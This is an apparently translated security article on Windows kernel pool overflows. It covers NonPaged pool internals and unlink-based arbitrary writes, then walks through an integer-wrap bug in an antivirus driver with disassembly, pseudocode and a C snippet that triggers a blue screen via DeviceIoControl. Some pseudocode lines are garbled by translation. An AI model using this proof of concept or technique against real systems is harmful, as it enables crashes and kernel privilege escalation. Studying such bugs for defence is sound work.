Kernel Pool Overflow: from theory to practice

The Windows kernel has always been a tasty morsel for a hacker, especially when there are complete methods for exploiting it, leading to elevation of rights. Considering the fact that over the past few years, the number of vulnerabilities associated with the overflow of the dynamic memory of the kernel has increased dramatically, I became actively interested in this direction and, to my own surprise, eventually dug up so much material that it would not suffice for one 0day bug.

Visual nuclear shellcode :)

The urgency of the problem

Memory Management technology is one of the most important in the work of the kernel. The vulnerabilities of this mechanism are perhaps also the most terrible and, at the same time, relevant. They are the main incentive to create all sorts of different types of protection, such as safe unlinking. This article will discuss in detail some aspects, both theoretical and practical, of the exploitation of a dynamic kernel memory overflow.
')
To begin, I will point the finger at the brightest representatives of the vulnerabilities of this caste:

ms08-001 - IGMPv3 Kernel Pool Overflow - remote overflow in tcpip.sys;
ms09-006 - vulnerability in processing certain wmf / emf entries associated with the win32k.sys flaw;
ms10-058 - integer overflow vulnerability leading to pool overflow in tcpip.sys.

Kernel Memory Allocation Overview

As in any self-respecting operating system, Windows (and more precisely, its kernel) provides some functions for allocating / freeing memory. Virtual memory consists of blocks called pages. In Intel x86 architecture, the page size is 4096 bytes. However, most requests for memory allocation are smaller than a page. Therefore, kernel functions, such as ExAllocatePoolWithTag and ExFreePoolWithTag, reserve unused memory for later allocation. Internal functions directly interact with hardware every time a page is involved. All these procedures are quite complex and delicate, which is why they are implemented in the kernel.

Differences between Paged and NonPaged pool

The system core memory is divided into two different pools. This trick was invented to allocate the most frequently used memory blocks. The system should know which pages are most in demand, and which pages can be temporarily abandoned (logical, right?). Paged pool can be saved in RAM or pushed into the file system (swap). NonPaged pool is used for important tasks, it exists only in RAM and for each IRQL level.

The pagefile.sys file contains paged memory. In the recent past, he was already falling victim to an attack, during which unsigned code was introduced into the Vista kernel. Among the solutions discussed, it was proposed to disable paged memory. Joanna Rutkowska advertised such a solution as safer than others, although the result was a small loss of physical memory. Microsoft refuses to directly access the disk, which confirms the importance of such features of the Windows kernel as Paged and NonPaged pools. This article is written with a focus on NonPaged pool, as the processing of the Paged-Pool is completely different. NonPaged pool can be considered as a more or less typical implementation of heap. Detailed information about system pools is available in Microsoft Windows Internals.

NonPaged pool table

Allocation algorithm should quickly distribute the most frequently used volumes. Therefore, there are three different tables, each of which allocates memory of a specific range. I found this structure in most memory management algorithms. Reading memory blocks from devices takes some time, so in Windows algorithms there is a balance between the response speed and the optimal memory allocation. Response time is reduced if memory blocks are saved for later allocation. On the other hand, redundant memory backups can affect performance.
The table is a separate way to store blocks of memory. We will look at each table and its location.

NonPaged lookaside is a table assigned to each processor and working with memory sizes less than or equal to 256 bytes. Each processor has a control register (PCR), which stores the service data of the processor - the level IRQL, GDT, IDT. The registry extension is called the control region (PCRB) and contains lookaside tables. The following windbg dump represents the structure of such a table:

Structure dumps in windbg

Lookaside tables provide the fastest reads of memory blocks compared to other types. For such an optimization, the delay time is very important, and a simply linked list (which is implemented in Lookaside) is much more efficient than a doubly linked one. The ExInterlockedPopEntrySList function is used to select an entry from the list using the hardware “lock” instruction. PPNPagedLookasideList is the aforementioned Lookaside table. It contains two Lookaside-lists: P and L. The “depth” field of the GENERAL_LOOKASIDE structure determines how many entries can be in the ListHead list. The system regularly updates this parameter using various counters. The update algorithm is based on the processor number and is not the same for P and L. In the P list, the “depth” field is updated more often than in the L list, because P is optimized for very small blocks.

The second table depends on the number of processors and how the system manages them. This method of memory allocation will be used if the volume is less than or equal to 4080 bytes, or if the lookaside-search returned no results. Even if the target table changes, it will have the same POOL_DESCRIPTOR structure. In the case of a single processor, the PoolVector variable is used to read the NonPagedPoolDescriptor pointer. In the case of many processors, the ExpNonPagedPoolDescriptor table contains 16 slots with pool descriptions. The PCRB of each processor points to the KNODE structure. A node can be associated with more than one processor and contains the "color" field used as a list for ExpNonPagedPoolDescriptor. The following diagrams illustrate this algorithm:

Pool description with one processor

Pool Description with Multiple Processors

Pool Description for Multiple Processors

The kernel defines the global variable ExpNumberOfNonPagedPools if this table is used by multiple processors. It must contain the number of processors.

The following windbg dump displays the POOL_DESCRIPTOR structure:

POOL_DESCRIPTOR structure

The spinlock queue has synchronization implemented; part of the HAL library is used to prevent conflicts in the pool descriptor. This procedure allows only one processor and one thread to get simultaneous access to the record from the pool descriptor. The HAL library varies across architectures. For the default pool handle, the main NonPaged spinlock is locked (LockQueueNonPagedPoolLock). And if it is not locked, then a separate spinlock queue is created for it.

The third and last table is used by processors for processing memory over 4080 bytes. MmNonPagedPoolFreeListHead is also used if other tables have run out of memory. Access to this table occurs when accessing the main queue NonPaged spinlock, also called LockQueueNonPagedPoolLock.

During the release of a smaller block of memory, ExFreePoolWithTag combines it with the previous and next free blocks. So a block of a page size or more can be created. In this case, the block is added to the MmNonPagedPoolFreeListHead table.

Algorithms for allocating and freeing memory

The memory distribution by the kernel in different versions of the OS almost does not change, but this algorithm is no less complicated than the heap user processes. In this part of the article I want to illustrate the basics of the behavior of tables in the course of procedures for allocating and freeing memory. Many details, such as synchronization mechanisms, will be intentionally omitted. These algorithms will help in explaining the method and understanding the basics of memory allocation in the kernel.

Allocation algorithm in NonPaged pool (ExAllocatePoolWithTag):

Visual Allocation Algorithm

Algorithm of release of NonPaged pool (ExFreePoolWithTag):

Accordingly, the memory allocation algorithm

From the blue screen of death to the fulfillment of desires

When the dynamic memory overflows, the metadata of other allocated blocks are usually overwritten, which basically leads to several BugChecks (or simply BSODs):

BAD_POOL_HEADER : Called in ExFreePoolWithTag code if the PreviousSize of the next chunk is not BlockSize of the current chunk.

BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request. This may or may not be due to the caller. The internal pool links must be walked to figure out a possible cause of the problem, and then special pool applied to the suspect tags or the driver verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 812c1000, The pool entry we were looking for within the page. <----
Arg3: 812c1fc8, The next pool entry. <---- ,
Arg4: 0bf90000, (reserved)

DRIVER_CORRUPTED_EXPOOL: Called in ExFreePoolWithTag code if a Page Fault exception occurred during unlink.

DRIVER_CORRUPTED_EXPOOL (c5)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high. This is caused by drivers that have corrupted the system pool. Run the driver verifier against any new (or suspect) drivers, and if that doesn't turn up the culprit, then use gflags to enable special pool.
Arguments:
Arg1: 43434343, memory referenced <----- Blink'a
Arg2: 00000002, IRQL
Arg3: 00000001, value 0 = read operation, 1 = write operation
Arg4: 80544d06, address which referenced memory

BAD_POOL_CALLER: Called in ExFreePoolWithTag code, if the chunk you are trying to free is already freed.

Let's take a closer look at the chunk header (metadata):

 //   typedef struct _POOL_HEADER { union { struct { USHORT PreviousSize : 9; USHORT PoolIndex : 7; USHORT BlockSize : 9; USHORT PoolType : 7; } ULONG32 Ulong1; } union { struct _EPROCESS* ProcessBilled; ULONG PoolTag; struct { USHORT AllocatorBackTraceIndex; USHORT PoolTagHash; } } } POOL_HEADER, *POOL_HEADER; // sizeof(POOL_HEADER) == 8

The values of PreviousSize, BlockSize are calculated as follows:

 PreviousSize = (____ + sizeof(POOL_HEADER)) / 8 BlockSize = (___ + sizeof(POOL_HEADER)) / 8

If the PoolType value is zero, then such a chunk is freed, and after the header comes the structure nt! _LIST_ENTRY.

kd> dt nt!_LIST_ENTRY
+0x000 Flink : Ptr32 _LIST_ENTRY
+0x004 Blink : Ptr32 _LIST_ENTRY

Exploitation

The chunk release algorithm works in such a way that if there is a free chunk after the release, the merge occurs, that is, one of the two free chunks is glued together. This is done by a simple unlink operation.

Remove entry entry from doubly linked list

PLIST_ENTRY b,f;
f=entry->Flink;
b=entry->Blink;
b->Flink=f;
f->Blink=b;

This leads to the rewriting of 4 bytes at the monitored address:

*()=
*(+4)=

Simple scheme of the algorithm that we have implemented

Practice!

With sufficient knowledge, consider the vulnerability in the driver of a single antivirus product.

.text:00016330 mov cx, [eax] ; eax
.text:00016333 inc eax
.text:00016334 inc eax
.text:00016335 test cx, cx
.text:00016338 jnz short loc_16330
.text:0001633A sub eax, edx
.text:0001633C sar eax, 1
.text:0001633E lea eax, [eax+eax+50h] ; UNICODE + 0x50
.text:00016342 movzx edi, ax ; , WORD
.text:00016345
.text:00016345 loc_16345:;
.text:00016345 movzx eax, di
.text:00016348 push ebx
.text:00016349 xor ebx, ebx
.text:0001634B cmp eax, ebx
.text:0001634D jz short loc_16359
.text:0001634F push eax; -
.text:00016350 push ebx; (NonPaged)
.text:00016351 call ds:ExAllocatePool ; chunk'a
.text:00016357 mov ebx, eax
[..]
.text:000163A6 movzx esi, word ptr [edx]
.text:000163A9 mov [eax+edx], si ;
.text:000163AD inc edx
.text:000163AE inc edx
.text:000163AF test si, si
[..]
.text:000163F5 push ebx; P
.text:000163F6 call sub_12A43
.text:00012A43 sub_12A43 proc near; CODE XREF: sub_12C9A+5Cp
.text:00012A43; sub_12C9A+79p ...
.text:00012A43
.text:00012A43 P = dword ptr 4
.text:00012A43
.text:00012A43 cmp esp+P], 0
.text:00012A48 jz short locret_12A56
.text:00012A4A push 0; Tag
.text:00012A4C push [esp+4+P]; P
.text:00012A50 call ds:ExFreePoolWithTag ; , write4

C-like pseudocode

 len = wsclen(attacker_controlled); total_len = (2*len + 0x50) ; size_2_alloc = (WORD)total_len; // integer wrap!!! mem = ExAllocatePool(size_2_alloc); .... wcscpy(mem, attacker_controlled);//     ... ExFreePool(mem); //  ,   ,   ,   ,      ,     ,    ring0-shellcode

As can be seen from the code, the vulnerability is related to the casting of integer types, which leads to the fact that the size for the unicode string will be calculated incorrectly. All this will lead to overflow, if you pass a buffer with a unicode string greater than 0xffff bytes to the driver.

Simple code to play BSoD

 hDevice = CreateFileA("\\\\.\\KmxSbx", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, NULL); inbuff = (char *)malloc(0x1C000); if(!inbuff){ printf("malloc failed!\n"); return 0; } memset(inbuff, 'A',0x1C000-1); memset(buff+0x11032, 0x00, 2);//end of unicode, size to allocate 0xff0 ioctl = 0x88000080; first_dword = 0x400; memcpy(buff, &first_dword, sizeof(DWORD)); DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, 0x1C000, (LPVOID)inbuff, 0x100, &cb,NULL);

The exploitation of this vulnerability is not as simple as it may seem at first glance. Here there are some limitations, namely - overflow (writing beyond the chunk border) huge (more than 0xffff), which potentially leads to a blue screen even before ExFreePoolWithTag execution (and, therefore, to replace the merge pointers):

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fe8aa000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: f0def3a9, If non-zero, the instruction address which referenced the bad memory address.
Arg4: 00000000, (reserved)
eax=00029fa8 ebx=fe8a7008 ecx=00000008 edx=fe880058 esi=00004141 edi=fe87d094
eip=f0def3a9 esp=f0011b78 ebp=f0011bac iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206
KmxSbx+0x63a9:
f0def3a9 66893410 mov word ptr [eax+edx],si ds:0023:fe8aa000=???? <---- ,

When overwriting memory, we can rewrite the data that are pointers to any nuclear structures, which can lead to the most unexpected consequences (the next BSoD).

To improve the operational efficiency of this vulnerability, we use the following trick: create N threads that call DeviceIoControl, with such parameters that with some probability N the number of blocks of a certain length (0xff0 in this example) are allocated, then released - this gives us a chance that overflow we will not get a blue screen like Page Fault (PAGE_FAULT_IN_NONPAGED_AREA). For a sample code with detailed comments, search on our DVD.

Visual nuclear shellcode :)

findings

At parting, I can only say that there is very little information on the Internet about operating the Kernel Pool Overflow. It also grieves that there are no working exploits in public, which creates a kind of delusion that it is very difficult to exploit memory overflow in the core, and if possible, the maximum outcome of the atrocities is a normal BSoD.

In this article, the authors tried to show with a real example that, by connecting ingenuity, one can improve the stability of the methods for exploiting such vulnerabilities.
In future articles we will talk about more complex aspects of the operation of Kernel Pool Overflow, which, of course, exist and are waiting in the wings :). Stay tuned!